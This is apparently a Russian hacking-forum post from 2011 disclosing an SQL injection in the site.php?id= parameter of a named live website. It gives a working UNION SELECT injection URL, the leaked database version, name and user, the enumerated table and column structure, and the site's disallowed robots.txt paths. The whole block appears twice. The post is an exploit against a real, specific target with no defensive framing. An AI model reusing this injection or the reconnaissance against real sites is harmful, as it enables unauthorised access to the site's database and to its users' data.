[Dark Green]
06.01.2011, 02:14
Сайт разработчика: http://valdis.org.ru Исходников нет, ибо скрипт платный и в паблике его нет. его вообще нигде нет, кроме как у автора, я не нашел во всяком случае =\
SQL inj в site.php?id=
Code:
http://valdis.org.ru/site.php?id=2758+and+1=0+union+select+version(),2, 3,4,5,6,7,8,database(),user(),11,12,13,14,15,16,17--
5.0.81-community
valdis_valdis
valdis_valdis@localhost
Структура БД:
Code:
table_name ; column_name
stat_valdis ; id, ip, date, page, ref, user
catid ; catid, catname, catstatus, cattitle
link ; link_id, link_project_id, link_category_id, link_manufacter_id, link_name, link_len, link_status
site ; siteid, sitesubid, sitedomain, sitestatus, sitetitle, sitename, siteurl, sitedescription, sitekeywords, siterecip, siteaddemail, siteadddate, sitelastdate, sitehost
Запрещено к индексированию:
Code:
/gotosite.php
/google
/goget
/context.php
/gosite.php
/img.php
/contact.php
/xap.php
/alfa.php
/partner.php
/add1.php
/sape.php
/sot.php
/hosting.php
/test
/article
/sotmarket.php
/jamba
/image.php
/shop.php?magaz=otziv_add
/shop.php?magaz=otziv_view
/shop.php?magaz=topic
SQL inj в site.php?id=
Code:
http://valdis.org.ru/site.php?id=2758+and+1=0+union+select+version(),2, 3,4,5,6,7,8,database(),user(),11,12,13,14,15,16,17--
5.0.81-community
valdis_valdis
valdis_valdis@localhost
Структура БД:
Code:
table_name ; column_name
stat_valdis ; id, ip, date, page, ref, user
catid ; catid, catname, catstatus, cattitle
link ; link_id, link_project_id, link_category_id, link_manufacter_id, link_name, link_len, link_status
site ; siteid, sitesubid, sitedomain, sitestatus, sitetitle, sitename, siteurl, sitedescription, sitekeywords, siterecip, siteaddemail, siteadddate, sitelastdate, sitehost
Запрещено к индексированию:
Code:
/gotosite.php
/goget
/context.php
/gosite.php
/img.php
/contact.php
/xap.php
/alfa.php
/partner.php
/add1.php
/sape.php
/sot.php
/hosting.php
/test
/article
/sotmarket.php
/jamba
/image.php
/shop.php?magaz=otziv_add
/shop.php?magaz=otziv_view
/shop.php?magaz=topic